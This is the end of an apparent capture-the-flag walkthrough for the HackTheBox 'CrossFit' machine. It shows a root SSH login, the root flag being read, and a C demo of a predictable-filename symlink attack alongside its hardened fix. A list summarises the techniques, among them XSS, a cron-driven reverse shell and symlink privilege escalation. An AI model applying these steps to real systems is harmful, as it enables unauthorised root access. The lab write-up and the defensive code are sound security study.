drwxr-xr-x 7 isaac isaac 4096 Nov 28 11:58 .
drwxr-xr-x 4 root root 4096 Sep 21 04:00 ..
lrwxrwxrwx 1 root root 9 May 12 2020 .bash_history -> /dev/null
-rw-r--r-- 1 isaac isaac 220 Apr 27 2020 .bash_logout
-rw-r--r-- 1 isaac isaac 3526 Apr 27 2020 .bashrc
drwx------ 5 isaac isaac 4096 May 4 2020 .cache
drwxr-xr-x 4 isaac isaac 4096 May 11 2020 .config
-rw-r--r-- 1 isaac isaac 16736 Nov 28 11:44 exploit
drwx------ 3 isaac isaac 4096 Apr 28 2020 .gnupg
drwxr-xr-x 3 isaac isaac 4096 May 4 2020 .local
lrwxrwxrwx 1 isaac isaac 9 May 4 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 isaac isaac 807 Apr 27 2020 .profile
lrwxrwxrwx 1 root root 9 May 12 2020 .python_history -> /dev/null
-rw-r--r-- 1 isaac isaac 369 Nov 28 11:52 root.sh
-rw-r--r-- 1 isaac isaac 74 May 5 2020 .selected_editor
drwxr-x--- 4 isaac admins 4096 May 9 2020 send_updates
isaac@crossfit:~$ chmod 777 *
chmod 777 *

Now run root.sh on the box, then from Kali:

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.208
Linux crossfit 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 21 04:46:55 2020
root@crossfit:~# id
uid=0(root) gid=0(root) groups=0(root)
root@crossfit:~# whoami
root
root@crossfit:~# ls
cleanup.sh delete_ftp_users.sh root.txt
root@crossfit:~# cat root.txt
961252b5bd669e97c7ab25e93fc1a3a3

Now we have root and can read root.txt.
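As an added example, not code from the walkthrough or from the dbmsg binary, the C program below contrasts the time-seeded rand() naming seen in dbmsg’s main() with what a defender would change: an unpredictable name from /dev/urandom and a write that refuses to follow a planted symlink, which is the behaviour root.sh relies on. The temp directory, the fixed seed and the message text are constructed for the demo; it assumes Linux with a writable /tmp.

```c
#define _GNU_SOURCE            /* for mkdtemp(), symlink(), O_NOFOLLOW */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* The pattern the decompiled main() uses: the only entropy is the current
 * second, so every process seeded in that second draws the same value. */
unsigned int predictable_token(time_t seed)
{
    srand((unsigned int)seed);
    return (unsigned int)rand();
}

/* Hardened name: 2*nbytes hex chars from the kernel CSPRNG (nbytes <= 32).
 * Returns 0 on success; nothing observable lets a local user guess the name. */
int secure_token(char *out, size_t nbytes)
{
    unsigned char raw[32];
    if (nbytes > sizeof raw) return -1;
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t got = fread(raw, 1, nbytes, f);
    fclose(f);
    if (got != nbytes) return -1;
    for (size_t i = 0; i < nbytes; i++) sprintf(out + 2 * i, "%02x", raw[i]);
    out[2 * nbytes] = '\0';
    return 0;
}

/* The unsafe write root.sh relies on: fopen("w") follows a symlink planted at
 * the guessed name, so a root writer lands wherever the link points. */
int write_message_unsafe(const char *path, const char *msg)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(msg, f);
    return fclose(f);
}

/* Hardened write: O_CREAT|O_EXCL rejects any pre-existing name (a planted
 * symlink included, errno EEXIST) and O_NOFOLLOW never follows one. */
int write_message_safe(const char *path, const char *msg)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n == (ssize_t)strlen(msg) ? 0 : -1;
}

/* Constructed scenario in a temp dir: plant a symlink at the predictable name
 * pointing at a stand-in authorized_keys, then show the unsafe writer clobbers
 * it while the safe writer refuses and a CSPRNG-named file still works.
 * Returns 1 when all three outcomes are observed. */
int demo_symlink_defense(void)
{
    char dir[] = "/tmp/dbmsg_demo_XXXXXX";
    if (!mkdtemp(dir)) return 0;
    char target[256], planted[256], fresh[256], tok[33], buf[64] = {0};
    snprintf(target, sizeof target, "%s/authorized_keys", dir);
    snprintf(planted, sizeof planted, "%s/%u", dir, predictable_token(1606564800));
    if (write_message_safe(target, "") != 0) return 0;   /* the victim file */
    if (symlink(target, planted) != 0) return 0;         /* the planted link */

    int unsafe_rc = write_message_unsafe(planted, "ssh-ed25519 AAAA... attacker\n");
    FILE *t = fopen(target, "r");
    if (!t) return 0;
    size_t len = fread(buf, 1, sizeof buf - 1, t);
    fclose(t);
    int clobbered = unsafe_rc == 0 && len > 0 && strstr(buf, "attacker") != NULL;

    int refused = write_message_safe(planted, "x") == -1 && errno == EEXIST;

    if (secure_token(tok, 16) != 0) return 0;
    snprintf(fresh, sizeof fresh, "%s/%s", dir, tok);
    int fresh_ok = write_message_safe(fresh, "newsletter body\n") == 0;

    unlink(fresh); unlink(planted); unlink(target); rmdir(dir);   /* tidy up */
    return clobbered && refused && fresh_ok;
}

int main(void)
{
    printf("same second, same token: %u == %u\n",
           predictable_token(1606564800), predictable_token(1606564800));
    printf("symlink defense demo: %s\n", demo_symlink_defense() ? "ok" : "FAILED");
    return 0;
}
```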

Summary of knowledge

  • use XSS plus a crafted JS file to read internal web pages
  • use a crafted JS file to trigger a PHP page
  • use john to crack hashes
  • PHP shellcommand library: the escapeArgs option is not working properly
  • crontab + MySQL to get a reverse shell
  • use pspy to see which processes cron runs
  • transfer files with nc
  • analyze a binary with Ghidra
  • ed25519 SSH key + predictable random number generator + bash script to privesc

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…